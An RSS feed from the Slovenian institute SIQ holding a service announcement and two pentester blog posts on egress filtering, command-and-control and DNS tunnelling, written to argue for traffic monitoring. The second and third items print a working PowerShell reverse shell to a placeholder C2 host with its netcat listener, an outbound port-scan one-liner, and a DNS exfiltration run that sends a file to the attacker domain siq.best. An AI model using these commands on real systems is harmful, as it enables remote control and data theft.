<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information Technology Assessment Archives - SIQ</title>
	<atom:link href="https://www.siq.si/en/category/information-technology-assessment/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.siq.si/en/category/information-technology-assessment/</link>
	<description>Slovenski institut za kakovost in meroslovje</description>
	<lastBuildDate>Tue, 10 Dec 2024 08:47:05 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.siq.si/wp-content/uploads/2018/10/cropped-fav-1-1-32x32.png</url>
	<title>Information Technology Assessment Archives - SIQ</title>
	<link>https://www.siq.si/en/category/information-technology-assessment/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>SIQ Expands Services to Support Compliance with New Cybersecurity Directive</title>
		<link>https://www.siq.si/en/news/siq-expands-services-to-support-compliance-with-new-cybersecurity-directive/</link>
		
		<dc:creator><![CDATA[Tina Predan]]></dc:creator>
		<pubDate>Tue, 10 Dec 2024 08:47:05 +0000</pubDate>
				<category><![CDATA[Information Technology Assessment]]></category>
		<category><![CDATA[Product Testing and Certification]]></category>
		<guid isPermaLink="false">https://www.siq.si/?post_type=news&#038;p=32342</guid>

					<description><![CDATA[<p>SIQ is proud to announce that it is now fully equipped to assist customers in meeting the requirements of the new EU Cybersecurity Directive. This expansion of services is designed to help businesses safeguard their digital infrastructure, ensuring compliance with the latest cybersecurity standards and regulations. The directive introduces stringent security requirements, particularly focusing on [&#8230;]</p>
<p>The post <a href="https://www.siq.si/en/news/siq-expands-services-to-support-compliance-with-new-cybersecurity-directive/">SIQ Expands Services to Support Compliance with New Cybersecurity Directive</a> appeared first on <a href="https://www.siq.si/en">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>SIQ is proud to announce that it is now fully equipped to assist customers in meeting the requirements of the new <strong>EU Cybersecurity</strong> Directive. This expansion of services is designed to help businesses safeguard their digital infrastructure, ensuring compliance with the latest cybersecurity standards and regulations.</p>
<p>The directive introduces stringent security requirements, particularly focusing on Internet of Things (IoT) devices, connected consumer products, and networked electronic equipment. To address these challenges, SIQ offers comprehensive cybersecurity assessments, including:</p>
<ul>
<li><strong>External and Internal Penetration Testing</strong>: Identifying vulnerabilities in external infrastructure, such as servers and applications, while testing the resilience of internal security controls.</li>
<li><strong>Web and Mobile Application Testing</strong>: Detecting weaknesses that could allow unauthorized data access and modification.</li>
<li><strong>Wireless Technology Assessments</strong>: Evaluating the security of wireless networks to prevent unauthorized access.</li>
<li><strong>IoT and Embedded Device Security</strong>: Ensuring the safety of IoT devices, including connected home automation systems, wearable health trackers, and smart home appliances.</li>
</ul>
<p>SIQ is accredited for ISO 27001 and eIDAS regulations and offers services aligned with key standards ETSI EN 303 645 and EN 18031, ensuring that clients not only meet regulatory requirements but also enhance the overall security of their products and systems.</p>
<p>With the introduction of these services, SIQ aims to be a trusted partner in navigating the evolving cybersecurity landscape, helping businesses protect their assets, comply with legal obligations, and maintain consumer trust in a digital age.</p>
<p>For more information, contact us at <a href="mailto:safety@siq.si">safety@siq.si</a>. Stay cyber safe with SIQ!</p>
<p>The post <a href="https://www.siq.si/en/news/siq-expands-services-to-support-compliance-with-new-cybersecurity-directive/">SIQ Expands Services to Support Compliance with New Cybersecurity Directive</a> appeared first on <a href="https://www.siq.si/en">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Even hackers wear (protective) masks, part 2</title>
		<link>https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-2/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Wed, 13 May 2020 06:25:44 +0000</pubDate>
				<category><![CDATA[Information Technology Assessment]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>In part 1 of this blog series, we considered two fundamental goals of cyber attackers, i.e. remote control of a victim and covert persistence from the attacker’s &#8220;command&#38;control&#8221; (C2) server. We know first-hand that the set-up of a reverse communication channel to internal assets of the target organisation is not always trivial. The ultimate manoeuvre [&#8230;]</p>
<p>The post <a href="https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-2/">Even hackers wear (protective) masks, part 2</a> appeared first on <a href="https://www.siq.si/en">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>In <a href="https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-1/">part 1</a> of this blog series, we considered two fundamental goals of cyber attackers, i.e. remote control of a victim and covert persistence from the attacker’s &#8220;command&amp;control&#8221; (C2) server. We know first-hand that the set-up of a reverse communication channel to internal assets of the target organisation is not always trivial. The ultimate manoeuvre used by pentesters on site in equally extreme situations is reverse tunnelling through the established DNS (Domain Name Service) protocol. The technique, which (sadly) is known not only to trained “ethical” hackers, will be demonstrated in this blog post.</p>
<p>As already mentioned, we also encounter exemplary security-hardened systems that do not permit random communication with external untrustworthy sources. In the best case, a pentester or a red teamer or, in the worst-case scenario, a hacker or injected malicious code tend to find their opportunity in legitimate communication channels (e.g. HTTP(S), RDP, SMTP, etc.). Modern security approaches may be used to detect obfuscation attempts in the form of so-called tunnelling relatively easily. Such techniques can be prevented efficiently as early as at network level. The same goes for the protocol and application inspection of the DNS protocol, which is often side-tracked – in the same manner as it was deliberately forgotten in the previous blog. To illustrate the issue, we provide an attractive description of a tool, otherwise widely available on the world wide web, that enables covert management of a remote system or exfiltration of data from it.</p>
<table>
<tbody>
<tr>
<td width="604"><span style="color: #003366;"><em>The shell uses legitimate DNS requests and responses to encode commands and exfiltrated data, making the traffic look like just a bunch of funky DNS requests on the wire.</em></span></td>
</tr>
</tbody>
</table>
<p>But let’s start at the basics. The legacy DNS service is considered as indispensable and is often compared to the traditional phone book in the world of the Internet. Namely, it enables the resolution of domain-name identifiers (e.g. of devices or services) to their corresponded Internet addresses used by connected ICT systems for communication with one another. It has been found that the prevalence of the DNS concept is the most likely reason for the perceived trust in it and its weak supervision in terms of cybersecurity. At this point, we would like to further enhance the initial observation; we believe that an analysis of DNS resolutions in typical organisations is anything but fulfilled potential.</p>
<p>Here are three essential arguments for continuous monitoring of DNS traffic:</p>
<ul>
<li>Expansion of security visibility within the organisation to a arbitrary type of communication that uses DNS (e.g. HTTP(S), RDP, SSH or any other attempt of an egress tunnelling from an infected device) for naming resolution.</li>
<li>DNS resolution is also used by Advanced Persistent Threats (e.g. DGA – Domain Generation Algorithm).</li>
<li>The integration of hybrid security solutions with dedicated Threat Intelligence Feeds that incorporates DNS IOCs (Indicators of Compromise).</li>
</ul>
<p>Permitted use of DNS even in the most restricted environments is, as a rule, good news for a hacker, both an ethical as well as a malicious one. It provides sufficient leverage for its abuse in circumstances when remote control via other (more intuitive) channels is not permitted. It turns out that a seemingly more conservative perimeter security policy that allows outgoing communication solely through UDP/53 socket with merely the trustworthy primary DNS server is considered lax enough. Moreover, the hierarchical design of the DNS concept allows reliable interaction between a (un)controlled malicious code (in the organisation’s internal network) and the attacker’s C2 server even though there is no direct connectivity with the victim of the attack or the latter is not allowed or is explicitly prohibited by perimeter security policy (e.g. firewalls). This unique behavior is shown in the example below:</p>
<p><img fetchpriority="high" decoding="async" class="alignnone size-large wp-image-18215" src="https://www.siq.si/wp-content/uploads/2020/05/victim-internet2-1024x371.png" alt="" width="1024" height="371" srcset="https://www.siq.si/wp-content/uploads/2020/05/victim-internet2-1024x371.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/victim-internet2-300x109.png 300w, https://www.siq.si/wp-content/uploads/2020/05/victim-internet2-768x278.png 768w, https://www.siq.si/wp-content/uploads/2020/05/victim-internet2.png 1531w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>To execute such an attack, the attacker must register a domain of his choice (a one-off cost of $2 suffices) with its corresponding authoritative DNS server pointing to the C2 command server in attacker’s possession. A malicious daemon is set up on the latter that is not aimed at serving legitimate DNS responses, but at interacting with a (un)controlled code on the compromised victim.</p>
<p>To demonstrate the technique, we registered the domain siq.best:</p>
<table>
<tbody>
<tr>
<td width="604"><span style="color: #003366;"><strong><em>DOMAIN REGISTRATION:</em></strong></span><br />
<span style="color: #003366;"><em>whois siq.best | grep name</em></span><br />
<span style="color: #003366;"><em>Domain Name: SIQ.BEST</em></span><br />
<span style="color: #003366;"><em>Name Server: <strong>C2_SERVER_FQDN</strong></em></span><br />
<span style="color: #003366;"><em>Name Server: NS4.MOJHOST.SI</em></span></td>
</tr>
</tbody>
</table>
<p>Below is a concise demonstration of the exfiltration of a sensitive information using the described technique:</p>
<table>
<tbody>
<tr>
<td width="604"><span style="color: #003366;"><strong><em>VICTIM [SIQ\mmesojednik]:</em></strong></span><br />
<span style="color: #003366;"><em>PS C:\Tools\DNSExFil&gt; Invoke-DNSExfiltrator -i C:\IMPORTANT\<strong>contract.txt</strong> -d <strong>siq.best</strong> -p password</em></span><br />
<span style="color: #003366;"><em>[*] Compressing (ZIP) the [contract.txt] file in memory</em></span><br />
<span style="color: #003366;"><em>[*] Encrypting the ZIP file with password [password]</em></span><br />
<span style="color: #003366;"><em>[*] Encoding the data with Base64URL</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>[*] Sending data&#8230;</em></span><br />
<span style="color: #003366;"><em>[*] DONE !</em></span><br />
<span style="color: #003366;"><em> </em></span><br />
<span style="color: #003366;"><strong><em>ATTACKER [C2 server | Authoritative DNS server]</em></strong></span><br />
<span style="color: #003366;"><em>#python dnsexfiltrator.py -d <strong>siq.best</strong> -p password</em></span><br />
<span style="color: #003366;"><em>[*] DNS server listening on port 53</em></span><br />
<span style="color: #003366;"><em>[+] Data was encoded using Base64URL</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>[+] Receiving file [contract.txt] as a ZIP file in [1] chunks</em></span><br />
<span style="color: #003366;"><em>[============================================================] 100.0%   </em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>[+] Decrypting using password [password] and saving to output file [contract.txt.zip]</em></span><br />
<span style="color: #003366;"><em>[+] Output file [contract.txt.zip] <span style="color: #ff0000;"><strong>saved successfully</strong></span></em></span><br />
<span style="color: #003366;"><strong><em>…</em></strong></span><br />
<span style="color: #003366;"><em># zcat contract.txt.zip</em></span><br />
<span style="color: #ff0000;"><strong><em>TOP SECRET!!!</em></strong></span></td>
</tr>
</tbody>
</table>
<p>The uniqueness of the above technique, which makes it even more convincing and efficient, is the masking of the identity (IP address or FQDN) of the C2 command server throughout the exfiltration procedure. Perhaps you have noticed that only the domain name is specified in the command-line switches above, but not the server address itself.</p>
<p>As evident from the traffic capture (use of the Wireshark tool) on the part of the simulated victim, the latter directly communicates only with the primary trustworthy DNS server. The Internet address of the C2 command server, which at the same time plays the role of the authoritative DNS server for the attacker’s <em>siq.best</em> domain, does not appear in the captured communication. The latter makes it extremely difficult to detect and prevent such an attack.</p>
<p><img decoding="async" class="alignnone size-large wp-image-18216" src="https://www.siq.si/wp-content/uploads/2020/05/traffic-2-1024x125.png" alt="" width="1024" height="125" srcset="https://www.siq.si/wp-content/uploads/2020/05/traffic-2-1024x125.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/traffic-2-300x37.png 300w, https://www.siq.si/wp-content/uploads/2020/05/traffic-2-768x94.png 768w, https://www.siq.si/wp-content/uploads/2020/05/traffic-2.png 1306w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>The actual interaction and created haze in the process of data exfiltration are evident from the recorded traffic. Indicators of compromise (IOCs) or deviation from legitimate DNS resolutions should obviously be (threat) hunted elsewhere, e.g. in high entropy of sought sub-domains of the umbrella domain siq.best, in the intensity of DNS querying from a single source, in the generated volume of DNS traffic, etc.</p>
<p>At this point, we would like to hold our breaths for a while and invite you, the readers, to share your experiences. The same invitation is also extended to specialized blue teams, Security Operations Centres (SOC) and enthusiastic IT specialists who detect and prevent the described techniques continuously and on an ongoing basis. Stay tuned …</p>
<p>The post <a href="https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-2/">Even hackers wear (protective) masks, part 2</a> appeared first on <a href="https://www.siq.si/en">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Even hackers wear (protective) masks, part 1</title>
		<link>https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-1/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Fri, 08 May 2020 08:05:42 +0000</pubDate>
				<category><![CDATA[Information Technology Assessment]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>The leakage or theft of sensitive information constitutes a serious security breach or a form of cybercrime. Hence, it is not uncommon that security experts consider data exfiltration as one of the more representative targets of motivated cyber attackers [MITRE ATT&#38;CK], [CYBER KILL-CHAIN]. In a series of articles – in the role of an independent [&#8230;]</p>
<p>The post <a href="https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-1/">Even hackers wear (protective) masks, part 1</a> appeared first on <a href="https://www.siq.si/en">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>The leakage or theft of sensitive information constitutes a serious security breach or a form of cybercrime. Hence, it is not uncommon that security experts consider data exfiltration as one of the more representative targets of motivated cyber attackers [MITRE ATT&amp;CK], [CYBER KILL-CHAIN].</p>
<p>In a series of articles – in the role of an independent pentester – we outline typical deficiencies in the design of information systems that (all too) often fail to provide sufficient ability to detect and prevent such attacks. In the first section, the issue of weak restrictions on egress communication in typical information systems of organisations is presented to the reader. The central part provides a description of more advanced malware technology that is based on the abuse of the perfectly legitimate and established DNS protocol (Domain Name Service), but enables complete control of the compromised system or, rather, the leakage of the data stored on it. The conclusion gives recommendations to enhance existing security mechanisms, so as to minimise the effect of established hacker techniques.</p>
<p>A simple test that is systematically performed in the client’s information system (e.g. as part of pentest or red teaming engagement) within the scope of reconnaissance is the test of restricting outbound communication. The latter is carried out in the direction from the user, e.g. a company employee or a home-based employee, towards the Internet. In the example below, we used Powershell. The tool is present by default in all modern versions of the MS Windows operating system and is, as such, (easily) accessible not only to users but also to a successful attacker or injected malicious code:</p>
<table>
<tbody>
<tr>
<td width="604"><em><span style="color: #ff0000;">1.. 65535</span><span style="color: #003366;"> | % {echo ((new-object Net.Sockets.TcpClient).Connect(&#8220;</span><span style="color: #ff0000;">C2_IP</span><span style="color: #003366;">&#8220;,$_)) &#8220;Port $_ is open!&#8221;} 2&gt;$null</span></em></td>
</tr>
</tbody>
</table>
<p>With the use of a simple one-liner, we check the selection of open communication channels in the direction from the user to the Internet. One might question the true significance or sensibility of doing such a test. Attackers are nevertheless outside secured information environments, which is why their attempts are expected to be targeted in the opposite direction. Many independent studies and specialists in information security have warned of the predominant share of cyber-attacks of internal origin.</p>
<p>Typical components of such an attack are:</p>
<ol>
<li>persistence and</li>
<li>command and control (C2) of the compromised system.</li>
</ol>
<div>
<p>C2 technique [2] is based on the set-up of a reverse communication channel between the victim and the attacker’s command&amp;control server and is usually the result of the launch of malicious code (e.g. by a user who clicks on a malicious attachment) or exploitation of a critical vulnerability of a running tool or application on a compromised system. A malicious reverse connection is established in the direction from the user towards the Internet, which makes it even harder to identify it and contain it in (at least) a seemingly legitimate communication between internal users and the worldwide web. Taking into account the predominant finding from security checks, i.e. that egress security policies of edge security devices are much laxer than ingress ones, the success of a C2 connection to the attacker’s server is more probable.<img decoding="async" class="size-large wp-image-18153" src="https://www.siq.si/wp-content/uploads/2020/05/Victim-internet-1024x283.png" alt="IT" width="1024" height="283" srcset="https://www.siq.si/wp-content/uploads/2020/05/Victim-internet-1024x283.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/Victim-internet-300x83.png 300w, https://www.siq.si/wp-content/uploads/2020/05/Victim-internet-768x212.png 768w, https://www.siq.si/wp-content/uploads/2020/05/Victim-internet.png 1452w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>Let us consider at this point which egress communication channels are usually permitted in the edge security systems of organisations. In the wild, pentesters are exceptionally, rather than as a rule, faced with enhanced configurations in terms of security, where the selection of permitted employee communications is selectively restricted solely to the web (e.g. HTTP/HTTPS) and mail service (e.g. IPAM, MAPI, SMTP). These are considered to be the most widely established forms of communication and information exchange in business entities, which is why their existence is practically urgent.</p>
<p>Nevertheless, does the restriction of communication channels (to exclusively web and mail) suffice for efficient cyber defence? It turns out that well-established communication channels, particularly when they are additionally encrypted (e.g. HTTPS, IMAPS), also provide an ideal ground for masking malicious activities by more and more skilful cyber attackers. Another extreme phenomenon has also been noticed in which nominally “secure” protocols (e.g. HTTPS) are, knowingly and due to the questionable impact of inspection, not subject to in-depth analysis on dedicated security devices. We believe that to be entirely unjustified, which can be seen from another example. The activated protocol and application inspection of TCP/80 should undoubtedly (or unambiguously) recognise the lower “loud” attempt to set up a reverse command shell.</p>
<table style="height: 273px;" width="963">
<tbody>
<tr>
<td style="padding-top: 0px !important;" width="614">
<p style="margin-bottom: 0px !important;"><span style="color: #003366;"><strong>VICTIM [SIQ\mmesojednik]:</strong></span><br />
<span style="color: #003366;"><em>$client = New-Object System.Net.Sockets.TCPClient(&#8220;C2_server&#8221;,80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );<br />
</em><em>$sendback2 = $sendback + &#8220;PS &#8221; + (pwd).Path + &#8220;&gt; &#8220;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};<br />
$client.Close()</em></span></p>
<p style="margin-bottom: 0px !important;"><span style="color: #003366;"><strong><br />
ATTACKER [C2 SERVER]:</strong></span><br />
<span style="color: #003366;"><em>#nc -nlvp 80</em></span><br />
<span style="color: #003366;"><em>Ncat: Listening on :::80</em></span><br />
<span style="color: #003366;"><em>Ncat: Connection from CLIENT_IP</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>&gt;whoami</em></span><br />
<span style="color: #003366;"><em>&gt;siq\mmesojednik</em></span></p>
</td>
</tr>
</tbody>
</table>
<p>The captured traffic (use of the Wireshark tool) clearly shows the tunnelling of the command shell via TCP/80, which is ordinarily intended for web browsing (HTTP):</p>
<p><img loading="lazy" decoding="async" class="alignnone size-large wp-image-18154" src="https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-1024x195.png" alt="" width="1024" height="195" srcset="https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-1024x195.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-300x57.png 300w, https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-768x147.png 768w, https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic.png 1090w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>To that end, next-generation security solutions have an in-built ability to identify protocol and/or application deviations on random transport channels.</p>
<p>Organisations with an efficient defence strategy in place against the most advanced cyber-attacks carry out a similar inspection of any interaction with service users, independently of the use of:</p>
<ul>
<li>the transport protocol (TCP or UDP),</li>
<li>transport ports (TCP/80, TCP/443) or</li>
<li>additional layers of encryption (HTTP, HTTPS).</li>
</ul>
<p>Remember, all of the above communication channels may be – in the event of weak protocol or application inspection – the attacker’s window of opportunity for undetectable:</p>
<ul>
<li>delivery of malicious code,</li>
<li>its further spread and/or enhancement and</li>
<li>leakage of sensitive information.</li>
</ul>
<p>Pentesters rarely encounter information environments with an extremely selective egress security policy that would completely prevent the use of the mentioned techniques. And yet we are also prepared for extreme circumstances, where the pentesters’ (attackers’) interactions with external entities are not permitted or likely.</p>
<p>The second part (part 2) of the series of articles will show a more advanced technique to abuse the DNS protocol, the use of which has been considered indispensable by most organisations. On the other hand, its successful abuse provides the attacker with remote control, overall management and leakage of data even from environments with extremely conservative security policy in place. Stay tuned …</p>
</div>
<p>The post <a href="https://www.siq.si/en/news/even-hackers-wear-protective-masks-part-1/">Even hackers wear (protective) masks, part 1</a> appeared first on <a href="https://www.siq.si/en">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
